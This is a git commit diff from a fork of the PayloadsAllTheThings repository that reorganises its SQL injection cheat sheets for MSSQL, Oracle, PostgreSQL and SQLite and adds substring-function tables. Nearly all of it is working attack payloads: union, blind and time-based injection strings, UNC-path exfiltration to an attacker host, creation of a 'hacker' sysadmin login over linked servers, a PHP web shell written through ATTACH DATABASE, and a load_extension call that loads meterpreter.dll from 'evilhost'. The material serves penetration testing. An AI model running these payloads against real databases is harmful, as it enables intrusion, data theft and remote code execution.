ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

MSSQL, OracleSQL, PostgreSQL Substring Equivalent

Browse Source
This commit is contained in:
Swissky 2024-11-16 15:35:43 +01:00
parent 67af38aa4e
commit 9a908a15d2
4 changed files with 187 additions and 169 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

225
SQL Injection/MSSQL Injection.md
View File

@ -7,17 +7,15 @@
* [MSSQL Default Databases](#mssql-default-databases) * [MSSQL Default Databases](#mssql-default-databases)
* [MSSQL Comments](#mssql-comments) * [MSSQL Comments](#mssql-comments)
* [MSSQL User](#mssql-user)
* [MSSQL Version](#mssql-version)
* [MSSQL Hostname](#mssql-hostname)
* [MSSQL Database Name](#mssql-database-name)
* [MSSQL Database Credentials](#mssql-database-credentials) * [MSSQL Database Credentials](#mssql-database-credentials)
* [MSSQL List Databases](#mssql-list-databases) * [MSSQL Enumeration](#mssql-enumeration)
* [MSSQL List Columns](#mssql-list-columns) * [MSSQL List Databases](#mssql-list-databases)
* [MSSQL List Tables](#mssql-list-tables) * [MSSQL List Columns](#mssql-list-columns)
* [MSSQL List Tables](#mssql-list-tables)
* [MSSQL Union Based](#mssql-union-based) * [MSSQL Union Based](#mssql-union-based)
* [MSSQL Error Based](#mssql-error-based) * [MSSQL Error Based](#mssql-error-based)
* [MSSQL Blind Based](#mssql-blind-based) * [MSSQL Blind Based](#mssql-blind-based)
* [MSSQL Blind With Substring Equivalent](#mssql-blind-with-substring-equivalent)
* [MSSQL Time Based](#mssql-time-based) * [MSSQL Time Based](#mssql-time-based)
* [MSSQL Stacked Query](#mssql-stacked-query) * [MSSQL Stacked Query](#mssql-stacked-query)
* [MSSQL Read File](#mssql-read-file) * [MSSQL Read File](#mssql-read-file)
@ -27,9 +25,10 @@
* [MSSQL Out of Band](#mssql-out-of-band) * [MSSQL Out of Band](#mssql-out-of-band)
* [MSSQL DNS Exfiltration](#mssql-dns-exfiltration) * [MSSQL DNS Exfiltration](#mssql-dns-exfiltration)
* [MSSQL UNC Path](#mssql-unc-path) * [MSSQL UNC Path](#mssql-unc-path)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [MSSQL Trusted Links](#mssql-trusted-links) * [MSSQL Trusted Links](#mssql-trusted-links)
* [MSSQL List Permissions](#mssql-list-permissions) * [MSSQL Privileges](#mssql-privileges)
* [MSSQL List Permissions](#mssql-list-permissions)
* [MSSQL Make User DBA](#mssql-make-user-dba)
* [References](#references) * [References](#references)
@ -54,39 +53,6 @@
| `;%00` | Null byte | | `;%00` | Null byte |
## MSSQL User
```sql
SELECT CURRENT_USER
SELECT user_name();
SELECT system_user;
SELECT user;
```
## MSSQL Version
```sql
SELECT @@version
```
## MSSQL Hostname
```sql
SELECT HOST_NAME()
SELECT @@hostname
SELECT @@SERVERNAME
SELECT SERVERPROPERTY('productversion')
SELECT SERVERPROPERTY('productlevel')
SELECT SERVERPROPERTY('edition');
```
## MSSQL Database Name
```sql
SELECT DB_NAME()
```
## MSSQL Database Credentials ## MSSQL Database Credentials
* **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578` * **MSSQL 2000**: Hashcat mode 131: `0x01002702560500000000000000000000000000000000000000008db43dd9b1972a636ad0c7d4b8c515cb8ce46578`
@ -102,58 +68,100 @@ SELECT DB_NAME()
``` ```
## MSSQL List Databases ## MSSQL Enumeration
| Description | SQL Query |
| ------------- | ----------------------------------------- |
| DBMS version | `SELECT @@version` |
| Database name | `SELECT DB_NAME()` |
| Hostname | `SELECT HOST_NAME()` |
| Hostname | `SELECT @@hostname` |
| Hostname | `SELECT @@SERVERNAME` |
| Hostname | `SELECT SERVERPROPERTY('productversion')` |
| Hostname | `SELECT SERVERPROPERTY('productlevel')` |
| Hostname | `SELECT SERVERPROPERTY('edition')` |
| User | `SELECT CURRENT_USER` |
| User | `SELECT user_name();` |
| User | `SELECT system_user;` |
| User | `SELECT user;` |
### MSSQL List Databases
```sql ```sql
SELECT name FROM master..sysdatabases; SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); — for N = 0, 1, 2, …
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases; -- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb (Only works in MSSQL 2017+) -- for N = 0, 1, 2, …
SELECT DB_NAME(N);
-- Change delimiter value such as ', ' to anything else you want => master, tempdb, model, msdb
-- (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysdatabases;
``` ```
## MSSQL List Columns ### MSSQL List Columns
```sql ```sql
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, column_name FROM information_schema.columns SELECT table_catalog, column_name FROM information_schema.columns
``` ```
## MSSQL List Tables ### MSSQL List Tables
```sql ```sql
SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views -- use xtype = 'V' for views
SELECT name FROM master..sysobjects WHERE xtype = 'U';
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U'; SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable
-- list column names and types for master..sometable
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable';
SELECT table_catalog, table_name FROM information_schema.columns SELECT table_catalog, table_name FROM information_schema.columns
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U'; -- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
-- Change delimiter value such as ', ' to anything else you want => trace_xe_action_map, trace_xe_event_map, spt_fallback_db, spt_fallback_dev, spt_fallback_usg, spt_monitor, MSreplication_options (Only works in MSSQL 2017+)
SELECT STRING_AGG(name, ', ') FROM master..sysobjects WHERE xtype = 'U';
``` ```
## MSSQL Union Based ## MSSQL Union Based
```sql * Extract databases names
-- extract databases names
$ SELECT name FROM master..sysdatabases
[*] Injection
[*] msdb
[*] tempdb
-- extract tables from Injection database ```sql
$ SELECT name FROM Injection..sysobjects WHERE xtype = 'U' $ SELECT name FROM master..sysdatabases
[*] Profiles [*] Injection
[*] Roles [*] msdb
[*] Users [*] tempdb
```
-- extract columns for the table Users * Extract tables from Injection database
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
-- Finally extract the data ```sql
$ SELECT UserId, UserName from Users $ SELECT name FROM Injection..sysobjects WHERE xtype = 'U'
``` [*] Profiles
[*] Roles
[*] Users
```
* Extract columns for the table Users
```sql
$ SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'Users')
[*] UserId
[*] UserName
```
* Finally extract the data
```sql
$ SELECT UserId, UserName from Users
```
## MSSQL Error Based ## MSSQL Error Based
@ -179,14 +187,26 @@ $ SELECT UserId, UserName from Users
AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- - AND LEN(SELECT TOP 1 username FROM tblusers)=5 ; -- -
``` ```
```sql
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
```
### MSSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
Examples:
```sql ```sql
AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97 AND ASCII(SUBSTRING(SELECT TOP 1 username FROM tblusers),1,1)=97
AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64-- AND UNICODE(SUBSTRING((SELECT 'A'),1,1))>64--
AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A' AND SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables > 'A'
AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90
SELECT @@version WHERE @@version LIKE '%12.0.2000.8%'
WITH data AS (SELECT (ROW_NUMBER() OVER (ORDER BY message)) as row,* FROM log_table)
SELECT message FROM data WHERE row = 1 and message like 't%'
``` ```
@ -312,12 +332,6 @@ RESTORE VERIFYONLY FROM DISK = '\\attackerip\file'
``` ```
## MSSQL Make User DBA
```sql
EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
```
## MSSQL Trusted Links ## MSSQL Trusted Links
> The links between databases work even across forest trusts. > The links between databases work even across forest trusts.
@ -349,32 +363,43 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
``` ```
## List Permissions
Listing effective permissions of current user on the server. ## MSSQL Privileges
### MSSQL List Permissions
* Listing effective permissions of current user on the server.
```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER');
```
* Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
* Listing effective permissions of current user on a view.
```sql
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
* Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
### MSSQL Make User DBA
```sql ```sql
SELECT * FROM fn_my_permissions(NULL, 'SERVER'); EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin;
``` ```
Listing effective permissions of current user on the database.
```sql
SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
```
Listing effective permissions of current user on a view.
```
SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name;
```
Check if current user is a member of the specified server role.
```sql
-- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
SELECT is_srvrolemember('sysadmin');
```
## MSSQL OPSEC ## MSSQL OPSEC

8
SQL Injection/OracleSQL Injection.md
View File

@ -16,6 +16,7 @@
* [Oracle SQL List Tables](#oracle-sql-list-tables) * [Oracle SQL List Tables](#oracle-sql-list-tables)
* [Oracle SQL Error Based](#oracle-sql-error-based) * [Oracle SQL Error Based](#oracle-sql-error-based)
* [Oracle SQL Blind](#oracle-sql-blind) * [Oracle SQL Blind](#oracle-sql-blind)
* [Oracle Blind With Substring Equivalent](#oracle-blind-with-substring-equivalent)
* [Oracle SQL Time Based](#oracle-sql-time-based) * [Oracle SQL Time Based](#oracle-sql-time-based)
* [Oracle SQL Out of Band](#oracle-sql-out-of-band) * [Oracle SQL Out of Band](#oracle-sql-out-of-band)
* [Oracle SQL Command Execution](#oracle-sql-command-execution) * [Oracle SQL Command Execution](#oracle-sql-command-execution)
@ -129,6 +130,13 @@ When the injection point is inside a string use : `'||PAYLOAD--`
| First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` | | First letter of first message is t | `SELECT message FROM log_table WHERE rownum=1 AND message LIKE 't%';` |
### Oracle Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
## Oracle SQL Time Based ## Oracle SQL Time Based
```sql ```sql

12
SQL Injection/PostgreSQL Injection.md
View File

@ -15,6 +15,7 @@
* [PostgreSQL Error Based](#postgresql-error-based) * [PostgreSQL Error Based](#postgresql-error-based)
* [PostgreSQL XML Helpers](#postgresql-xml-helpers) * [PostgreSQL XML Helpers](#postgresql-xml-helpers)
* [PostgreSQL Blind](#postgresql-blind) * [PostgreSQL Blind](#postgresql-blind)
* [PostgreSQL Blind With Substring Equivalent](#postgresql-blind-with-substring-equivalent)
* [PostgreSQL Time Based](#postgresql-time-based) * [PostgreSQL Time Based](#postgresql-time-based)
* [PostgreSQL Out of Band](#postgresql-out-of-band) * [PostgreSQL Out of Band](#postgresql-out-of-band)
* [PostgreSQL Stacked Query](#postgresql-stacked-query) * [PostgreSQL Stacked Query](#postgresql-stacked-query)
@ -119,11 +120,22 @@ Note, with the above queries, the output needs to be assembled in memory. For la
## PostgreSQL Blind ## PostgreSQL Blind
### PostgreSQL Blind With Substring Equivalent
| Function | Example |
| ----------- | ----------------------------------------------- |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTRING` | `SUBSTRING('foobar' FROM <START> FOR <LENGTH>)` |
Examples:
```sql ```sql
' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE ' and substr(version(),1,10) = 'PostgreSQL' and '1 -- TRUE
' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE ' and substr(version(),1,10) = 'PostgreXXX' and '1 -- FALSE
``` ```
## PostgreSQL Time Based ## PostgreSQL Time Based
#### Identify Time Based #### Identify Time Based

111
SQL Injection/SQLite Injection.md
View File

@ -7,15 +7,14 @@
* [SQLite Comments](#sqlite-comments) * [SQLite Comments](#sqlite-comments)
* [SQLite Version](#sqlite-version) * [SQLite Version](#sqlite-version)
* [String Based - Extract Database Structure](#string-based---extract-database-structure) * [SQLite String](#sqlite-string)
* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name) * [SQLite String Methodology](#sqlite-string-methodology)
* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name) * [SQLite Blind](#sqlite-blind)
* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables) * [SQLite Blind Methodology](#sqlite-blind-methodology)
* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name) * [SQLite Blind With Substring Equivalent](#sqlite-blind-with-substring-equivalent)
* [Boolean - Extract Info](#boolean---extract-info) * [SQlite Error Based](#sqlite-error-based)
* [Boolean - Error Based](#boolean---error-based) * [SQlite Time Based](#sqlite-time-based)
* [Time Based](#time-based) * [SQlite Remote Code Execution](#sqlite-remote-code-execution)
* [Remote Code Execution](#remote-code-execution)
* [Attach Database](#attach-database) * [Attach Database](#attach-database)
* [Load_extension](#load_extension) * [Load_extension](#load_extension)
* [References](#references) * [References](#references)
@ -23,10 +22,11 @@
## SQLite Comments ## SQLite Comments
```sql | Type | Description |
-- |----------------------------|-----------------------------------|
/**/ | `/* SQLite Comment */` | C-style comment |
``` | `--` | SQL comment |
## SQLite Version ## SQLite Version
@ -34,82 +34,54 @@
select sqlite_version(); select sqlite_version();
``` ```
## SQLite String
## String Based - Extract Database Structure ### SQLite String Methodology
```sql | Description | SQL Query |
SELECT sql FROM sqlite_schema | ----------------------- | ----------------------------------------- |
``` | Extract Database Structure | `SELECT sql FROM sqlite_schema` |
if sqlite_version > 3.33.0 | Extract Database Structure (sqlite_version > 3.33.0) | `SELECT sql FROM sqlite_master` |
```sql | Extract Table Name | `SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'` |
SELECT sql FROM sqlite_master | Extract Column Name | `SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'` |
``` | Extract Column Name | `SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');` |
## Integer/String Based - Extract Table Name ## SQLite Blind
```sql ### SQLite Blind Methodology
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
``` | Description | SQL Query |
| ----------------------- | ----------------------------------------- |
| Count Number Of Tables | `AND (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' ) < number_of_table` |
| Enumerating Table Name | `AND (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0)=table_name_length_number` |
| Extract Info | `AND (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) > HEX('some_char')` |
| Extract Info (order by) | `CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%' LIMIT 1 OFFSET 0) = HEX('some_char') THEN <order_element_1> ELSE <order_element_2> END` |
## Integer/String Based - Extract Column Name ### SQLite Blind With Substring Equivalent
```sql | Function | Example |
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name' | ----------- | ----------------------------------------- |
``` | `SUBSTRING` | `SUBSTRING('foobar', <START>, <LENGTH>)` |
| `SUBSTR` | `SUBSTR('foobar', <START>, <LENGTH>)` |
For a clean output
```sql
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```
Cleaner output
```sql
SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
```
## Boolean - Count Number Of Tables ## SQlite Error Based
```sql
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```
## Boolean - Enumerating Table Name
```sql
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```
## Boolean - Extract Info
```sql
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```
### Boolean - Extract Info (order by)
```sql
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```
## Boolean - Error Based
```sql ```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
``` ```
## Time Based
## SQlite Time Based
```sql ```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2)))) AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
``` ```
## Remote Code Execution ## SQLite Remote Code Execution
### Attach Database ### Attach Database
@ -121,11 +93,12 @@ INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
### Load_extension ### Load_extension
:warning: This component is disabled by default.
```sql ```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');-- UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
``` ```
Note: By default this component is disabled.
## References ## References